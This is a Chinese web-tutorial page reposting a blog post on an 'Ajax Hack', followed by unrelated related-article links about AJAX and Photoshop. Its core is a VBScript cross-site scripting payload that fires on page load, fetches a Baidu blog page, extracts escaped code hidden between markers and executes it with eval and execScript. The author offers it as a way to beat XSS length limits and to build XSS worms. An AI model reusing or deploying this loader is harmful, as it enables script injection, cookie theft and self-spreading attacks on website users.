一个有趣的Ajax Hack示范

2016-02-19 13:00 7 1 收藏

清醒时做事，糊涂时读书，大怒时睡觉，无聊时关注图老师为大家准备的精彩内容。下面为大家推荐一个有趣的Ajax Hack示范，无聊中的都看过来。

【 tulaoshi.com - Web开发】

今天在梦之光芒的BLOG上看见了一个Ajax Hack示范，其实跨站发现很容易，但是要做到大危害还是很难，偷偷COOKIE什么的只针对用户而已，XSS WORM的那种利用才是可怕的。

来看看他的一段VBSCRIPT脚本

代码如下：
vbscript:execute("
dim l,s:
l=chr(13)+chr(10):
s=""sub mycode""&l:
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:
s=s&""http.open """"get"""",url,false""&l:
s=s&""http.send("""""""")""&l:
s=s&""pg=http.responseText""&l:
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:
s=s&""if p=null or p1 then exit sub""&l:
s=s&""p=instr(p,pg,chr(37))""&l:
s=s&""if p=null or p1 then exit sub""&l:
s=s&""p2=instr(p,pg,chr(60))""&l:
s=s&""cd=mid(pg,p,p2-p)""&l:
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:
s=s&""window.execScript ht,""""jscript""""""&l:
s=s&""end sub""&l:
execute(s):
document.body.onload=getref(""mycode""):
")
调用代码在 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
这样就实现了本站调用代码，换个思路，是否这就解决了Ajax Hack常用的的提交数据限制（站外提交没有权限,XSS代码长度限制)的问题，呵呵~这里我也没实验。

再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来，也许我们就能在苛刻的XSS漏洞上创造奇迹！

来源:http://www.tulaoshi.com/n/20160219/1602760.html

上一篇： Ajax乱码问题整理
下一篇：经典Java开发工具介绍（5）：WebGain Studio 4 with VisualCafé

看过《一个有趣的Ajax Hack示范》的人还看了以下文章更多>>

一个方便AJAX开发的通用类

标签： Web开发

Name: AJAXRequest Author: HotHeart(xujiwei) Site: http://www.xujiwei.cn/ Blog: http://www.xujiwei.cn/blog/ Copyright (c) 2006, All Rights Reserved 类名：AJAXRequest 版本：0.3 日期：2006-12-18 介绍：AJAXRequest是一个方便AJAX开发的通用类，可以方便地进行一些AJAX中需要...

用AJAX编写一个简单的相册

AJAX(Asynchronous JavaScript And XML)是一种运用JavaScript和可扩展标记语言(XML)，在网络浏览器和服务器之间传送或接受数据的技术。主要应用于Ria(Rich internet applications)的开发上。 xml问题终于在今天还是解决了。最后在FireFox里还是使用了Dom的一些老方法。我这里就具体解释一下方法吧. 代码： var XmlHttp; //用来...

ajax传递一个参数具体实现

标签： Web开发

代码如下： !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" html xmlns="http://www.w3.org/1999/xhtml" head title/title script src="js/Jquery1.7.js" type="text/javascript"/script script type="text/javascript" $(function () { $('#txtUserName'...

一个jsp+AJAX评论系统

标签： Web开发

这是一个简单的评论系统,使用了JDOM(这边使用Jdom-b9),实例使用JSP作为视图,结合使用AJAX(用到prototype-1.4),Servlet和JavaBean作为后台处理，使用xml文件存储数据。 1.应用目录结构如下: data |--comment.xml js |--prototype.js |--ufo.js(UTF-8格式) &...

Photoshop简单几步设计一个有趣的时尚广告

标签： PS PS基础 ps平面设计教程 ps去水印教程

最终效果本教程如何短短的几个步骤设计时尚有趣广告教程。新建像素500 × 700TuLaoShi.com入门创建一个新文件有关，分辨率（DPI）的72个像素，然后填充线性渐变它与使用颜色＃0582ae和＃0ab7db。你也可以使用自己的图片。打开图片，复制到主画面。然后运用矩形选框工具创建下面以我选择的图片。图片下载地...

查看更多精彩>>